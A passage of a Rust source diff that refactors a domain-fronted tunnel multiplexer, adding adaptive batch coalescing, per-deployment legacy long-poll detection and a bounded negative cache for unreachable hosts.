+/// hosts; we don't want a runaway map. Pruned opportunistically on insert.
+const UNREACHABLE_CACHE_MAX: usize = 256;
+
+// ---------------------------------------------------------------------------
+// Pipeline debug overlay state — temporary, polled from Android UI.
+// ---------------------------------------------------------------------------
+pub(crate) mod pipeline_debug {
+    use std::collections::VecDeque;
+    use std::sync::{Mutex, OnceLock};
+    use portable_atomic::AtomicU64;
+    use std::sync::atomic::Ordering;
+
+    const EVENT_CAP: usize = 30;
+
+    struct SessionInfo {
+        depth: usize,
+        inflight: usize,
+        elevated: bool,
+    }
+
+    struct State {
+        events: Mutex<VecDeque<String>>,
+        elevated: AtomicU64,
+        max_elevated: AtomicU64,
+        active_batches: AtomicU64,
+        max_batch_slots: AtomicU64,
+        active_sessions: AtomicU64,
+        sessions: Mutex<std::collections::HashMap<String, SessionInfo>>,
+    }
+
+    fn state() -> &'static State {
+        static S: OnceLock<State> = OnceLock::new();
+        S.get_or_init(|| State {
+            events: Mutex::new(VecDeque::with_capacity(EVENT_CAP)),
+            elevated: AtomicU64::new(0),
+            max_elevated: AtomicU64::new(0),
+            active_batches: AtomicU64::new(0),
+            max_batch_slots: AtomicU64::new(0),
+            active_sessions: AtomicU64::new(0),
+            sessions: Mutex::new(std::collections::HashMap::new()),
+        })
+    }
+
+    pub fn push_event(_msg: String) {}
+    pub fn set_limits(_max_elev: u64, _max_batches: u64) {}
+    pub fn set_elevated(_n: u64) {}
+    pub fn batch_acquire() {}
+    pub fn batch_release() {}
+    pub fn session_start(_sid: &str) {}
+    pub fn session_end(_sid: &str) {}
+    pub fn session_update(_sid: &str, _depth: usize, _inflight: usize, _elevated: bool) {}
+
+    pub fn to_json() -> String {
+        let s = state();
+        let events_json = if let Ok(g) = s.events.lock() {
+            let escaped: Vec<String> = g.iter().map(|e| {
+                format!("\"{}\"", e.replace('\\', "\\\\").replace('"', "\\\""))
+            }).collect();
+            format!("[{}]", escaped.join(","))
+        } else {
+            "[]".to_string()
+        };
+        let sessions_json = if let Ok(g) = s.sessions.lock() {
+            let entries: Vec<String> = g.iter().map(|(sid, info)| {
+                format!(
+                    r#"{{"sid":"{}","depth":{},"inflight":{},"elevated":{}}}"#,
+                    sid, info.depth, info.inflight, info.elevated,
+                )
+            }).collect();
+            format!("[{}]", entries.join(","))
+        } else {
+            "[]".to_string()
+        };
+        format!(
+            r#"{{"elevated":{},"max_elevated":{},"active_batches":{},"max_batch_slots":{},"active_sessions":{},"sessions":{},"events":{}}}"#,
+            s.elevated.load(Ordering::Relaxed),
+            s.max_elevated.load(Ordering::Relaxed),
+            s.active_batches.load(Ordering::Relaxed),
+            s.max_batch_slots.load(Ordering::Relaxed),
+            s.active_sessions.load(Ordering::Relaxed),
+            sessions_json,
+            events_json,
+        )
+    }
+}
+
 /// Ports where the *server* speaks first (SMTP banner, SSH identification,
 /// POP3/IMAP greeting, FTP banner). On these, waiting for client bytes
 /// gains nothing and just adds handshake latency — skip the pre-read.
@@ -77,10 +224,44 @@ fn is_server_speaks_first(port: u16) -> bool {
     matches!(port, 21 | 22 | 25 | 80 | 110 | 143 | 587)
 }
 
+/// Recognize the tunnel-node's connect-error strings that mean
+/// "this destination is fundamentally unreachable from the tunnel-node's
+/// network right now" — distinct from refused/reset/timeout, which can be
+/// transient. These come through as the inner `e` of a `TunnelResponse`
+/// after the tunnel-node's std::io::Error is stringified, so we match on
+/// substrings rather than `ErrorKind`. Linux: errno 101 (ENETUNREACH),
+/// errno 113 (EHOSTUNREACH). Format varies a bit across libc/Tokio
+/// versions, so cover both the human text and the os-error tag.
+fn is_unreachable_error_str(s: &str) -> bool {
+    let lc = s.to_ascii_lowercase();
+    lc.contains("network is unreachable")
+        || lc.contains("no route to host")
+        || lc.contains("os error 101")
+        || lc.contains("os error 113")
+}
+
+/// Canonicalize a host string for use as a negative-cache key. DNS names
+/// are case-insensitive and may carry a trailing root-label dot, so
+/// `Example.COM:443`, `example.com:443`, and `example.com.:443` are all the
+/// same destination. IPv4 / IPv6 literals are unaffected — IPv4 has no
+/// letters, and `Ipv6Addr::to_string()` already emits lowercase.
+fn normalize_cache_host(host: &str) -> String {
+    let trimmed = host.strip_suffix('.').unwrap_or(host);
+    trimmed.to_ascii_lowercase()
+}
+
 // ---------------------------------------------------------------------------
 // Multiplexer
 // ---------------------------------------------------------------------------
 
+/// Reply payload for ops that go through `fire_batch`. The `String` is the
+/// `script_id` of the deployment that processed the batch — needed by
+/// `tunnel_loop`'s legacy-detection and per-deployment skip-when-idle
+/// decisions, which can't reach `fire_batch`'s local `script_id` any
+/// other way. Plain `Connect` doesn't go through `fire_batch` and keeps
+/// the simpler reply type.
+type BatchedReply = oneshot::Sender<Result<(TunnelResponse, String), String>>;
+
 enum MuxMsg {
     Connect {
         host: String,
@@ -90,48 +271,104 @@ enum MuxMsg {
     ConnectData {
         host: String,
         port: u16,
-        // Arc so the caller can hand the buffer to the mux AND keep a ref
-        // for the fallback path without an extra 64 KB copy per session.
-        data: Arc<Vec<u8>>,
-        reply: oneshot::Sender<Result<TunnelResponse, String>>,
+        // `Bytes` is internally Arc-backed, so the caller can cheaply
+        // clone() to keep its own reference for the unsupported-fallback
+        // replay path without an extra 64 KB copy per session.
+        data: Bytes,
+        reply: BatchedReply,
     },
     Data {
         sid: String,
-        data: Vec<u8>,
-        reply: oneshot::Sender<Result<TunnelResponse, String>>,
+        data: Bytes,
+        seq: Option<u64>,
+        wseq: Option<u64>,
+        reply: BatchedReply,
     },
     UdpOpen {
         host: String,
         port: u16,
-        data: Vec<u8>,
-        reply: oneshot::Sender<Result<TunnelResponse, String>>,
+        data: Bytes,
+        reply: BatchedReply,
     },
     UdpData {
         sid: String,
-        data: Vec<u8>,
-        reply: oneshot::Sender<Result<TunnelResponse, String>>,
+        data: Bytes,
+        reply: BatchedReply,
     },
     Close {
         sid: String,
     },
 }
 
+/// Raw, not-yet-encoded form of a batch operation. Lives only inside
+/// `mux_loop` and gets converted to `BatchOp` (with base64-encoded `d`)
+/// inside `fire_batch`'s spawned task — keeping the encoding work off
+/// the single mux thread, which previously had to base64 every op
+/// inline before it could move on to the next message.
+struct PendingOp {
+    op: &'static str,
+    sid: Option<String>,
+    host: Option<String>,
+    port: Option<u16>,
+    /// Raw payload. `None` for empty polls and other payload-less ops; an
+    /// empty `Some` is kept so `connect_data` still serializes `d`.
+    data: Option<Bytes>,
+    /// True for ops that must serialize `d` even when empty (currently
+    /// only `connect_data`, which uses presence of `d` as the signal
+    /// that the caller is opting into the bundled-first-bytes flow).
+    encode_empty: bool,
+    seq: Option<u64>,
+    wseq: Option<u64>,
+}
+
 pub struct TunnelMux {
-    tx: mpsc::Sender<MuxMsg>,
+    tx: mpsc::UnboundedSender<MuxMsg>,
     /// Set to `true` after the first time the tunnel-node rejects
     /// `connect_data` as unsupported. Subsequent sessions skip the
     /// optimistic path entirely and go straight to plain connect + data.
     connect_data_unsupported: Arc<AtomicBool>,
-    /// Set to `true` after we observe an empty poll round-trip that
-    /// returned in less than `LEGACY_DETECT_THRESHOLD` with no data.
-    /// On a long-poll-capable tunnel-node, an empty poll either returns
-    /// quickly *with data* (push arrived) or holds open until the
-    /// server's `LONGPOLL_DEADLINE`. A fast empty reply means the server
-    /// is doing the legacy fixed-sleep drain — in that mode, hammering
-    /// idle sessions at the new 500 ms cadence wastes Apps Script quota
-    /// for no benefit, so the loop reverts to the pre-long-poll
-    /// "skip empty polls when idle" behavior.
-    server_no_longpoll: Arc<AtomicBool>,
+    /// Per-deployment legacy state: `script_id` → time it was last
+    /// observed serving an empty poll faster than `LEGACY_DETECT_THRESHOLD`.
+    /// Absence means "long-poll capable, or untested." Entries expire after
+    /// `LEGACY_RECOVER_AFTER` so a redeployed / recovered tunnel-node
+    /// rejoins the long-poll fast path without requiring a process restart.
+    ///
+    /// Note: the per-deployment marks here do *not* drive a per-deployment
+    /// poll cadence — the `tunnel_loop` cadence (read-timeout backoff and
+    /// skip-empty-when-idle) is gated on the aggregate `all_legacy`,
+    /// because the next op's deployment is chosen later by
+    /// `next_script_id()` round-robin and the loop can't pre-select. What
+    /// the per-deployment design *does* fix vs the old single AtomicBool:
+    ///   * one slow / legacy deployment can no longer flip the aggregate
+    ///     true on its own — every deployment has to be marked first;
+    ///   * deployments recover individually on the TTL, so an upgraded
+    ///     tunnel-node lifts the aggregate without needing the others to
+    ///     also recover or the process to restart;
+    ///   * the warn log fires once per (deployment, recovery cycle), so
+    ///     re-detection after recovery is a real signal in the logs.
+    /// The cost: legacy deployments still receive fast empty polls in
+    /// mixed mode (round-robin doesn't know to avoid them). Worth it to
+    /// keep pushed bytes flowing through the long-poll-capable peers.
+    legacy_deployments: Mutex<HashMap<String, Instant>>,
+    /// Lock-free hot-path snapshot of "every known deployment is currently
+    /// in legacy mode." Recomputed under `legacy_deployments`'s mutex on
+    /// every mark/expire and read with a relaxed load from `tunnel_loop`.
+    /// True only when this process has fast-empty observations for *all*
+    /// `num_scripts` deployments simultaneously — that's when the per-
+    /// session 30 s read-timeout backoff (the only setting where there is
+    /// no per-deployment alternative) is still appropriate. Invariant: the
+    /// atomic is always written *after* the map insert, under the same
+    /// lock, so any reader that sees `true` was preceded by a complete
+    /// map update.
+    all_legacy: Arc<AtomicBool>,
+    /// Count of *unique* configured deployment IDs at start time.
+    /// Snapshotted from `fronter.script_id_list()` deduped, since the
+    /// aggregate gate compares this against `legacy_deployments.len()`
+    /// (a HashMap, so unique-keyed) — using the raw configured count
+    /// would make the gate unreachable whenever a user lists the same
+    /// script_id twice. Blacklisted-but-configured deployments still
+    /// count here; see `all_servers_legacy` for why.
+    num_scripts: usize,
     /// Pre-read observability. Lets an operator see whether the 50 ms
     /// wait-for-first-bytes is pulling its weight:
     ///   * `preread_win` — client sent bytes in time, bundled with connect
@@ -149,65 +386,137 @@ pub struct TunnelMux {
     /// Separate monotonic counter used only to trigger the summary log
     /// (avoids a race where two threads both see `total % 100 == 0`).
     preread_total_events: AtomicU64,
+    /// Short-lived negative cache for targets the tunnel-node reported as
+    /// unreachable (`Network is unreachable` / `No route to host`). Keyed by
+    /// `(host, port)`, value is the expiry instant. Plain Mutex<HashMap> is
+    /// fine: it's touched once per CONNECT (cheap) and once per failure.
+    unreachable_cache: Mutex<HashMap<(String, u16), Instant>>,
+    /// How long a session waits for its batch reply before giving up and
+    /// retry-polling on the next tick. Computed at construction from
+    /// `fronter.batch_timeout() + REPLY_TIMEOUT_SLACK` so the session-
+    /// side `reply_rx` always outlives `fire_batch`'s single HTTP
+    /// round-trip. Without runtime derivation, an operator who raises
+    /// `request_timeout_secs` would see sessions abandon replies just
+    /// before the batch would have completed.
+    reply_timeout: Duration,
+    /// How many sessions are currently at elevated pipeline depth (>= 3).
+    elevated_sessions: AtomicU64,
+    max_elevated: u64,
 }
 
 impl TunnelMux {
-    pub fn start(fronter: Arc<DomainFronter>) -> Arc<Self> {
-        let n = fronter.num_scripts();
+    /// Builds the mux state, spawns `mux_loop` on the runtime, and returns the shared handle.
+    pub fn start(fronter: Arc<DomainFronter>, coalesce_step_ms: u64, coalesce_max_ms: u64) -> Arc<Self> {
+        // Dedupe before snapshotting: the aggregate `all_legacy` gate compares
+        // `legacy_deployments.len()` (a HashMap, so unique keys) against this
+        // count, so the raw `num_scripts()` would make the gate unreachable
+        // whenever a user lists the same script_id twice in config.
+        let unique: std::collections::HashSet<&str> = fronter
+            .script_id_list()
+            .iter()
+            .map(String::as_str)
+            .collect();
+        let unique_n = unique.len();
+        let raw_n = fronter.num_scripts(); // configured count, duplicates included
+        if unique_n != raw_n {
+            tracing::warn!(
+                "tunnel mux: {} deployments configured but only {} unique script_id(s) — duplicate entries ignored for legacy detection",
+                raw_n,
+                unique_n,
+            );
+        }
         tracing::info!(
             "tunnel mux: {} deployment(s), {} concurrent per deployment",
-            n,
+            unique_n,
             CONCURRENCY_PER_DEPLOYMENT
         );
-        let (tx, rx) = mpsc::channel(512);
-        tokio::spawn(mux_loop(rx, fronter));
+        let step = if coalesce_step_ms > 0 { coalesce_step_ms } else { DEFAULT_COALESCE_STEP_MS };
+        let max = if coalesce_max_ms > 0 { coalesce_max_ms } else { DEFAULT_COALESCE_MAX_MS };
+        tracing::info!("batch coalesce: step={}ms max={}ms, pipeline max depth: {}, optimist: {}", step, max, INFLIGHT_ACTIVE, INFLIGHT_OPTIMIST);
+        // Reply timeout co-varies with `request_timeout_secs` so an
+        // operator who raises the batch budget doesn't have sessions
+        // abandoning replies just before the HTTP round-trip would
+        // have completed. See the `reply_timeout` field comment for
+        // the invariant.
+        let reply_timeout = fronter
+            .batch_timeout()
+            .saturating_add(REPLY_TIMEOUT_SLACK);
+        pipeline_debug::set_limits(
+            MAX_ELEVATED_PER_DEPLOYMENT * unique_n as u64,
+            (CONCURRENCY_PER_DEPLOYMENT * unique_n) as u64,
+        );
+        let (tx, rx) = mpsc::unbounded_channel(); // unbounded: senders never wait for capacity
+        tokio::spawn(mux_loop(rx, fronter, step, max));
         Arc::new(Self {
             tx,
             connect_data_unsupported: Arc::new(AtomicBool::new(false)),
-            server_no_longpoll: Arc::new(AtomicBool::new(false)),
+            legacy_deployments: Mutex::new(HashMap::new()),
+            all_legacy: Arc::new(AtomicBool::new(false)),
+            num_scripts: unique_n,
             preread_win: AtomicU64::new(0),
             preread_loss: AtomicU64::new(0),
             preread_skip_port: AtomicU64::new(0),
             preread_skip_unsupported: AtomicU64::new(0),
             preread_win_total_us: AtomicU64::new(0),
             preread_total_events: AtomicU64::new(0),
+            unreachable_cache: Mutex::new(HashMap::new()),
+            reply_timeout,
+            elevated_sessions: AtomicU64::new(0),
+            max_elevated: MAX_ELEVATED_PER_DEPLOYMENT * unique_n as u64,
         })
     }
 
+    /// How long a session waits for its batch reply before retry-polling.
+    /// Fixed at construction in `start` as `fronter.batch_timeout()` plus
+    /// `REPLY_TIMEOUT_SLACK`, so it outlasts `fire_batch`'s HTTP round-trip.
+    pub fn reply_timeout(&self) -> Duration {
+        self.reply_timeout
+    }
+
+    fn send_sync(&self, msg: MuxMsg) {
+        let _ = self.tx.send(msg); // best-effort enqueue: a send error is deliberately ignored
+    }
+
     async fn send(&self, msg: MuxMsg) {
-        let _ = self.tx.send(msg).await;
+        let _ = self.tx.send(msg); // no `.await`: the enqueue completes synchronously; errors are ignored
     }
 
     pub async fn udp_open(
         &self,
         host: &str,
         port: u16,
-        data: Vec<u8>,
+        data: impl Into<Bytes>,
     ) -> Result<TunnelResponse, String> {
         let (reply_tx, reply_rx) = oneshot::channel();
         self.send(MuxMsg::UdpOpen {
             host: host.to_string(),
             port,
-            data,
+            data: data.into(),
             reply: reply_tx,
         })
         .await;
         match reply_rx.await {
-            Ok(r) => r,
+            // Only the response is surfaced; the paired `_script_id` is dropped.
+            Ok(outcome) => outcome.map(|(resp, _script_id)| resp),
             Err(_) => Err("mux channel closed".into()),
         }
     }
 
-    pub async fn udp_data(&self, sid: &str, data: Vec<u8>) -> Result<TunnelResponse, String> {
+    pub async fn udp_data(
+        &self,
+        sid: &str,
+        data: impl Into<Bytes>,
+    ) -> Result<TunnelResponse, String> {
         let (reply_tx, reply_rx) = oneshot::channel();
         self.send(MuxMsg::UdpData {
             sid: sid.to_string(),
-            data,
+            data: data.into(),
             reply: reply_tx,
         })
         .await;
         match reply_rx.await {
-            Ok(r) => r,
+            // Only the response is surfaced; the paired `_script_id` is dropped.
+            Ok(outcome) => outcome.map(|(resp, _script_id)| resp),
             Err(_) => Err("mux channel closed".into()),
         }
     }
@@ -231,19 +540,147 @@ impl TunnelMux {
         }
     }
 
-    fn server_no_longpoll(&self) -> bool {
-        self.server_no_longpoll.load(Ordering::Relaxed)
+    /// True only when *every* known deployment is currently in legacy
+    /// mode. Both per-session decisions in `tunnel_loop` (the 30 s
+    /// read-timeout backoff and the skip-empty-when-idle short-circuit)
+    /// gate on this aggregate — they can't pick a per-deployment answer
+    /// ahead of time because the next op's deployment is chosen by
+    /// `next_script_id()` only when the batch fires. With one
+    /// long-poll-capable peer still around, the loop must keep emitting
+    /// empty polls so round-robin lands some on that peer (where the
+    /// server can hold them open and deliver pushed bytes).
+    ///
+    /// Known limitation: the comparison is against *all configured*
+    /// deployments (`num_scripts`), not currently-selectable ones. A
+    /// fleet where most deployments are blacklisted in `DomainFronter`
+    /// (10 min cooldown) and the only selectable deployment(s) are
+    /// legacy will keep the fast cadence for up to that cooldown, even
+    /// though every reachable peer is legacy. Accepted because
+    /// integrating the blacklist would require a hot-path query on the
+    /// fronter's mutex once per `tunnel_loop` iteration; a heavily-
+    /// blacklisted fleet has bigger problems than quota optimization,
+    /// and the worst-case quota cost is bounded by the cooldown.
+    ///
+    /// Hot path: lock-free relaxed load. If the cached value is `true`,
+    /// double-check under the mutex with a sweep for expired entries —
+    /// otherwise stale legacy marks would keep us in the slow path forever
+    /// after every deployment recovers (the `mark_server_no_longpoll` sweep
+    /// only fires on the next mark, which may never come).
+    fn all_servers_legacy(&self) -> bool {
+        if !self.all_legacy.load(Ordering::Relaxed) {
+            return false; // fast path: flag is clear, return before taking the lock
+        }
+        let now = Instant::now();
+        let mut deps = match self.legacy_deployments.lock() {
+            Ok(g) => g,
+            Err(p) => p.into_inner(), // poisoned mutex: keep using the map it guards
+        };
+        deps.retain(|_, marked_at| now.duration_since(*marked_at) < LEGACY_RECOVER_AFTER);
+        let still_all = deps.len() == self.num_scripts;
+        if !still_all {
+            self.all_legacy.store(false, Ordering::Relaxed); // written while `deps` is still locked
+        }
+        still_all
     }
 
-    fn mark_server_no_longpoll(&self) {
-        if !self.server_no_longpoll.swap(true, Ordering::Relaxed) {
+    /// Marks `script_id` as legacy (no long-poll) as of now and recomputes
+    /// the `all_legacy` aggregate; warns only when the id was not yet marked.
+    fn mark_server_no_longpoll(&self, script_id: &str) {
+        let now = Instant::now();
+        let mut deps = match self.legacy_deployments.lock() {
+            Ok(g) => g,
+            Err(p) => p.into_inner(),
+        };
+        // Inline expiry sweep: entries older than LEGACY_RECOVER_AFTER are
+        // dropped first so they no longer count toward the aggregate.
+        deps.retain(|_, marked_at| now.duration_since(*marked_at) < LEGACY_RECOVER_AFTER);
+        // `insert` returns the previous value: `Some` means already marked.
+        let was_present = deps.insert(script_id.to_string(), now).is_some();
+        let all = deps.len() == self.num_scripts;
+        // Atomic written under the lock and *after* the map insert. Any
+        // reader that observes `all_legacy = true` has seen a complete
+        // map state where every deployment is marked.
+        self.all_legacy.store(all, Ordering::Relaxed);
+        drop(deps);
+        // Log only on the first mark of a cycle; re-logging after expiry and
+        // re-detection is intentional (the deployment regressed to legacy).
+        if !was_present {
+            // `get(..8)` is panic-free for short ids and non-ASCII boundaries.
+            let short = script_id.get(..8).unwrap_or(script_id);
             tracing::warn!(
-                "tunnel-node returned an empty poll faster than {:?}; assuming legacy (no long-poll) drain — falling back to skip-empty-when-idle to avoid quota waste",
+                "tunnel-node deployment {}... returned an empty poll faster than {:?}; assuming legacy (no long-poll) drain — this deployment will skip empty polls when idle for the next {:?}",
+                short,
                 LEGACY_DETECT_THRESHOLD,
+                LEGACY_RECOVER_AFTER,
             );
         }
     }
 
+    /// Reports whether `(host, port)` currently has a live (non-expired) entry
+    /// in the unreachable cache; an expired entry is removed as a side effect.
+    /// Lets the proxy front-end answer "host unreachable" without a tunnel trip.
+    pub fn is_unreachable(&self, host: &str, port: u16) -> bool {
+        let now = Instant::now();
+        // A poisoned lock still guards a usable map; recover it rather than
+        // panicking on a cache lookup.
+        let mut cache = self
+            .unreachable_cache
+            .lock()
+            .unwrap_or_else(|poisoned| poisoned.into_inner());
+        let key = (normalize_cache_host(host), port);
+        let live = cache.get(&key).map(|expiry| *expiry > now);
+        if live == Some(false) {
+            // Stale entry: drop it so the map does not retain dead keys.
+            cache.remove(&key);
+        }
+        live.unwrap_or(false)
+    }
+
+    /// Negative-caches `(host, port)` for `UNREACHABLE_CACHE_TTL` when `err`
+    /// is classified by `is_unreachable_error_str` as network-unreachable /
+    /// no-route-to-host. Every other error is ignored: those may be
+    /// transient, and a flaky moment must not lock a host out.
+    fn record_unreachable_if_match(&self, host: &str, port: u16, err: &str) {
+        if !is_unreachable_error_str(err) {
+            return;
+        }
+        let mut cache = self
+            .unreachable_cache
+            .lock()
+            .unwrap_or_else(|poisoned| poisoned.into_inner());
+        // Size bound, enforced before inserting. At the cap we first purge
+        // whatever has already expired; if that frees nothing (a burst of
+        // distinct hosts inside one TTL window) we evict the entries closest
+        // to expiry until there is room. Purging on expiry alone would let
+        // the map grow without limit until the oldest TTL ran out.
+        if cache.len() >= UNREACHABLE_CACHE_MAX {
+            let now = Instant::now();
+            cache.retain(|_, expiry| *expiry > now);
+            while cache.len() >= UNREACHABLE_CACHE_MAX {
+                let soonest = cache
+                    .iter()
+                    .min_by_key(|(_, expiry)| **expiry)
+                    .map(|(target, _)| target.clone());
+                // An empty map has no victim; stop instead of spinning
+                // (only reachable if the cap itself is zero).
+                let Some(target) = soonest else {
+                    break;
+                };
+                cache.remove(&target);
+            }
+        }
+        // Insert (or refresh) the entry with a full TTL counted from now.
+        let key = (normalize_cache_host(host), port);
+        cache.insert(key, Instant::now() + UNREACHABLE_CACHE_TTL);
+        tracing::debug!(
+            "negative-cached {}:{} for {:?} ({})",
+            host,
+            port,
+            UNREACHABLE_CACHE_TTL,
+            err
+        );
+    }
+
     fn record_preread_win(&self, port: u16, elapsed: Duration) {
         self.preread_win.fetch_add(1, Ordering::Relaxed);
         self.preread_win_total_us
@@ -302,7 +739,9 @@ impl TunnelMux {
     }
 }
 
-async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
+async fn mux_loop(mut rx: mpsc::UnboundedReceiver<MuxMsg>, fronter: Arc<DomainFronter>, coalesce_step_ms: u64, coalesce_max_ms: u64) {
+    let coalesce_step = Duration::from_millis(coalesce_step_ms);
+    let coalesce_max = Duration::from_millis(coalesce_max_ms);
     // One semaphore per deployment ID, each allowing 30 concurrent requests.
     let sems: Arc<HashMap<String, Arc<Semaphore>>> = Arc::new(
         fronter
@@ -319,21 +758,42 @@ async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
 
     loop {
         let mut msgs = Vec::new();
-        match tokio::time::timeout(Duration::from_millis(30), rx.recv()).await {
-            Ok(Some(msg)) => msgs.push(msg),
-            Ok(None) => break,
-            Err(_) => continue,
+        // Block on the first message — no point waking up to find an empty
+        // queue. Once the first op lands, the adaptive coalesce loop waits
+        // in `coalesce_step` increments (resetting on each new arrival, up
+        // to `coalesce_max`) so concurrent ops land in the same batch.
+        match rx.recv().await {
+            Some(msg) => msgs.push(msg),
+            None => break,
         }
-        while let Ok(msg) = rx.try_recv() {
-            msgs.push(msg);
+        let hard_deadline = tokio::time::Instant::now() + coalesce_max;
+        let mut soft_deadline = tokio::time::Instant::now() + coalesce_step;
+        loop {
+            // Drain anything that's already queued without waiting.
+            while let Ok(msg) = rx.try_recv() {
+                msgs.push(msg);
+                // Reset the soft deadline — more ops are arriving.
+                soft_deadline = tokio::time::Instant::now() + coalesce_step;
+            }
+            let now = tokio::time::Instant::now();
+            let wait_until = soft_deadline.min(hard_deadline);
+            if now >= wait_until {
+                break;
+            }
+            match tokio::time::timeout(wait_until - now, rx.recv()).await {
+                Ok(Some(msg)) => {
+                    msgs.push(msg);
+                    // New op arrived — extend the soft deadline.
+                    soft_deadline = tokio::time::Instant::now() + coalesce_step;
+                }
+                Ok(None) => return,
+                Err(_) => break, // soft or hard deadline hit, no more ops
+            }
         }
 
         // Split: plain connects go parallel, data-bearing ops get batched.
-        let mut data_ops: Vec<BatchOp> = Vec::new();
-        let mut data_replies: Vec<(usize, oneshot::Sender<Result<TunnelResponse, String>>)> =
-            Vec::new();
+        let mut accum = BatchAccum::new();
         let mut close_sids: Vec<String> = Vec::new();
-        let mut batch_payload_bytes: usize = 0;
 
         for msg in msgs {
             match msg {
@@ -359,68 +819,32 @@ async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
                     data,
                     reply,
                 } => {
-                    let encoded = Some(B64.encode(data.as_slice()));
-                    let op_bytes = encoded.as_ref().map(|s| s.len()).unwrap_or(0);
-
-                    if !data_ops.is_empty()
-                        && (data_ops.len() >= MAX_BATCH_OPS
-                            || batch_payload_bytes + op_bytes > MAX_BATCH_PAYLOAD_BYTES)
-                    {
-                        fire_batch(
-                            &sems,
-                            &fronter,
-                            std::mem::take(&mut data_ops),
-                            std::mem::take(&mut data_replies),
-                        )
-                        .await;
-                        batch_payload_bytes = 0;
-                    }
-
-                    let idx = data_ops.len();
-                    data_ops.push(BatchOp {
-                        op: "connect_data".into(),
+                    let op_bytes = encoded_len(data.len());
+                    let op = PendingOp {
+                        op: "connect_data",
                         sid: None,
                         host: Some(host),
                         port: Some(port),
-                        d: encoded,
-                    });
-                    data_replies.push((idx, reply));
-                    batch_payload_bytes += op_bytes;
-                }
-                MuxMsg::Data { sid, data, reply } => {
-                    let encoded = if data.is_empty() {
-                        None
-                    } else {
-                        Some(B64.encode(&data))
+                        data: Some(data),
+                        encode_empty: true,
+                        seq: None,
+                        wseq: None,
                     };
-                    let op_bytes = encoded.as_ref().map(|s| s.len()).unwrap_or(0);
-
-                    // If adding this op would exceed limits, fire current
-                    // batch first and start a new one.
-                    if !data_ops.is_empty()
-                        && (data_ops.len() >= MAX_BATCH_OPS
-                            || batch_payload_bytes + op_bytes > MAX_BATCH_PAYLOAD_BYTES)
-                    {
-                        fire_batch(
-                            &sems,
-                            &fronter,
-                            std::mem::take(&mut data_ops),
-                            std::mem::take(&mut data_replies),
-                        )
-                        .await;
-                        batch_payload_bytes = 0;
-                    }
-
-                    let idx = data_ops.len();
-                    data_ops.push(BatchOp {
-                        op: "data".into(),
+                    accum.push_or_fire(op, op_bytes, reply, &sems, &fronter).await;
+                }
+                MuxMsg::Data { sid, data, seq, wseq, reply } => {
+                    let op_bytes = encoded_len(data.len());
+                    let op = PendingOp {
+                        op: "data",
                         sid: Some(sid),
                         host: None,
                         port: None,
-                        d: encoded,
-                    });
-                    data_replies.push((idx, reply));
-                    batch_payload_bytes += op_bytes;
+                        data: if data.is_empty() { None } else { Some(data) },
+                        encode_empty: false,
+                        seq,
+                        wseq,
+                    };
+                    accum.push_or_fire(op, op_bytes, reply, &sems, &fronter).await;
                 }
                 MuxMsg::UdpOpen {
                     host,
@@ -428,70 +852,32 @@ async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
                     data,
                     reply,
                 } => {
-                    let encoded = if data.is_empty() {
-                        None
-                    } else {
-                        Some(B64.encode(&data))
-                    };
-                    let op_bytes = encoded.as_ref().map(|s| s.len()).unwrap_or(0);
-
-                    if !data_ops.is_empty()
-                        && (data_ops.len() >= MAX_BATCH_OPS
-                            || batch_payload_bytes + op_bytes > MAX_BATCH_PAYLOAD_BYTES)
-                    {
-                        fire_batch(
-                            &sems,
-                            &fronter,
-                            std::mem::take(&mut data_ops),
-                            std::mem::take(&mut data_replies),
-                        )
-                        .await;
-                        batch_payload_bytes = 0;
-                    }
-
-                    let idx = data_ops.len();
-                    data_ops.push(BatchOp {
-                        op: "udp_open".into(),
+                    let op_bytes = encoded_len(data.len());
+                    let op = PendingOp {
+                        op: "udp_open",
                         sid: None,
                         host: Some(host),
                         port: Some(port),
-                        d: encoded,
-                    });
-                    data_replies.push((idx, reply));
-                    batch_payload_bytes += op_bytes;
+                        data: if data.is_empty() { None } else { Some(data) },
+                        encode_empty: false,
+                        seq: None,
+                        wseq: None,
+                    };
+                    accum.push_or_fire(op, op_bytes, reply, &sems, &fronter).await;
                 }
                 MuxMsg::UdpData { sid, data, reply } => {
-                    let encoded = if data.is_empty() {
-                        None
-                    } else {
-                        Some(B64.encode(&data))
-                    };
-                    let op_bytes = encoded.as_ref().map(|s| s.len()).unwrap_or(0);
-
-                    if !data_ops.is_empty()
-                        && (data_ops.len() >= MAX_BATCH_OPS
-                            || batch_payload_bytes + op_bytes > MAX_BATCH_PAYLOAD_BYTES)
-                    {
-                        fire_batch(
-                            &sems,
-                            &fronter,
-                            std::mem::take(&mut data_ops),
-                            std::mem::take(&mut data_replies),
-                        )
-                        .await;
-                        batch_payload_bytes = 0;
-                    }
-
-                    let idx = data_ops.len();
-                    data_ops.push(BatchOp {
-                        op: "udp_data".into(),
+                    let op_bytes = encoded_len(data.len());
+                    let op = PendingOp {
+                        op: "udp_data",
                         sid: Some(sid),
                         host: None,
                         port: None,
-                        d: encoded,
-                    });
-                    data_replies.push((idx, reply));
-                    batch_payload_bytes += op_bytes;
+                        data: if data.is_empty() { None } else { Some(data) },
+                        encode_empty: false,
+                        seq: None,
+                        wseq: None,
+                    };
+                    accum.push_or_fire(op, op_bytes, reply, &sems, &fronter).await;
                 }
                 MuxMsg::Close { sid } => {
                     close_sids.push(sid);
@@ -499,35 +885,145 @@ async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
             }
         }
 
+        // `close` ops piggyback on whatever batch we're about to fire — no
+        // reply channel, no payload, just tell tunnel-node to drop the sid.
         for sid in close_sids {
-            data_ops.push(BatchOp {
-                op: "close".into(),
+            accum.pending_ops.push(PendingOp {
+                op: "close",
                 sid: Some(sid),
                 host: None,
                 port: None,
-                d: None,
+                data: None,
+                encode_empty: false,
+                seq: None,
+                wseq: None,
             });
         }
 
-        if data_ops.is_empty() {
+        if accum.pending_ops.is_empty() {
             continue;
         }
 
-        fire_batch(&sems, &fronter, data_ops, data_replies).await;
+        fire_batch(&sems, &fronter, accum.pending_ops, accum.data_replies).await;
+    }
+}
+
+/// Per-iteration accumulator for `mux_loop`. Owns the three fields that
